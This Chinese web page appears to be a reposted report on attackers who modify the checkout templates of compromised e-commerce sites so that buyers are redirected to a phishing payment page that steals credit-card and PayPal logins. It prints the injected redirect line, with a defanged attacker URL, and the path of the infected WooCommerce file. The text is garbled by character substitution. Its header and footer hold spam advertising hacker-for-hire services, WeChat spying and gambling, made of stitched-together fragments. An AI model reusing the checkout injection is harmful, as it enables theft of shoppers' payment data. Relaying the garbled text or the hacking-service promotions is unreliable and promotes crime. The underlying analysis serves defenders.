说说最近的一个电商网站“垂钓”事例

访客5年前关于黑客接单1215


在曩昔的两年里,运用被黑的电商网站对客户的信用卡信息进行垂钓,这种 *** 现已十分盛行了。
前史事例
此前咱们曾陈述过多起事例,黑客在付款页面和付出模块加上了歹意代码,以此来盗取客户的付出信息。客户自身由于并没有太多的特征能够参阅,然后很难察觉到这一点。而站长则由于此举不会搅扰到付出流程,也不容易发现这点。
与此同时,传统的盗取信用卡信息,或者是银行、PayPal登录信息的活动,也是十分活泼的。
但是,在这个月咱们遇到了上述两种类型(单纯的垂钓网站和被黑的正常站点)的组合进犯,黑客在被黑的电商站点上更改付款页面的代码,然后将客户定向到第三方垂钓网站的付出页面。
垂钓黑客通常会运用电子邮件和垂钓网站去诱惑受害者。而在今日介绍的事例中,进犯者直接在被黑的合法电商网站上,绑架了付款页面。
虚伪的付款页面
当客户在为产品进行付出时,他们会翻开付款页面。但实际上,他们翻开的并不是该电商网站付出页面,而是黑客垂钓网站的付出页面(比方这个垂钓站:http://cwcargo.com/Checkout/)。

垂钓付款页面
它看起来的确像是正常的付款页面,假如受害者是之一次在该网站买东西,不看地址栏的话他们乃至认识不到现已转到一个彻底不同的网站。由于受害者现已启动了购物剁手形式,预备输入他们的信用卡账户了,所以这个时分受害者的警惕性是相对要低许多的。最终,你的信用卡信息被盗了,本来合法的电商网站也失去了这单买卖。
这种进犯并不是只针对信用卡的。如你前面所见到的,垂钓也支撑PayPal付出。假如你点击了PayPal选项,你会看到跳转到PayPal的登录页面。当然,这儿其实是cwcargo垂钓网站。

当您输入您的登录信息后,垂钓的php脚本/Checkout/PayPal-login/POST.php,会企图盗取你的PayPal登录信息。处于某种原因,它还会将你导向bluepay.com网站。
咱们发现这些付款垂钓页面,并没有被谷歌官方列入垂钓站黑名单,所以咱们向谷歌进行了陈述。当然,咱们也向本来的电商站长进行了陈述,希望能抢救一些潜在的受害者。
歹意重定向
咱们回过头看看那个被黑的电商网站,黑客在这儿做的十分简略,只是在付出页面加了一小段 *** 代码:
script>document.location="hxxp://cwcargo.com/Checkout"script>
比方,一个运用了Woo Commerce的WordPress站点,受感染的文件:
wp-content/plugins/woocommerce/templates/checkout/form-checkout.php
会看起来像这样(34行):
 

这次进犯也影响了其他的金融渠道,比方这篇剖析,便是感染了主题文件shopping-cart.tpl。
咱们现在还没有看到太多受感染的网站,究竟这类进犯很难进行检测。你需求在完结下单后才能去拜访并扫描付款页面,大多数扫描器是不足以做到这一点的。尽管如此,咱们发现这类 *** 在Magento类网站是比较多见的,并且这类进犯的 *** 可能会跟着时刻的推移而改变。
维护你的电商网站
根据前面的剖析,咱们主张客户在网上购物时,每一步都需求保持警惕:
检测URL栏的地址和链接安全性。
查看付出时的订单数量和收款人称号。
在存在疑点的情况下,不要继续进行付款操作。
 

相关文章

微信监视,国外去哪里找黑客,找一本黑客小时 手机被水

Leadbbs: makealltopanc.aspZhu在10月底向谷歌安全团队陈述了这个缝隙,可是这个团队不认可她的缝隙陈述,回应说这个缝隙并不是安全问题。 @Override渠道中一切东西同享同...

免费接单黑客_找一个黑客群

昨日315晚会咱们都看了吗?日前,暗码办理公司SplashData第8次发布了年度最弱暗码列表。 研究人员剖析了互联网上走漏的超越500万个暗码,发现计算机用户仍然在运用可猜测的、很简略就可以猜到的暗...

有没有和我一样赌博输的倾家荡产的?

在域中新建一个用于测试的账户test就算不开启ssl模块,你自己修改apache配置,能开启其他端口,也是能利用的补丁下载链接有没有和我一样赌博输的倾家荡产的?, 实话实说,我还是理不清适用场景,因此...

黑客团队接单网,上那个网找黑客,找黑客帮忙查看微信

No1 Seay源代码审计东西在本次试验中,请留意试验东西、试验文件寄存途径,不同的文件途径可能会呈现不一样的试验成果。 n"); 下面来看看信号掩盖的问题怎么处理。 有个要害的条件是遥控器只发数据,...

赌博赢来的钱,可以借人吗,还人吗,能做一些什么

Windows Server 2012 R2.text:0000000000466B04 movsxd rax, dword ptr ; 取得索引① 环境搭建验证过程:赌博赢来的钱,可以借人吗,还人吗...

数据剖析与可视化:谁是安全圈的吃鸡第一人

放假和小伙伴们打了几把PUBG,大半年没碰,竟然也意外地躺着吃了次鸡。吃鸡这个游戏公然得4个知道的人打(dai)战(dai)术(wo)才更风趣。 因为身边搞安全的人比较多,之前也会和一些安全圈的大佬一...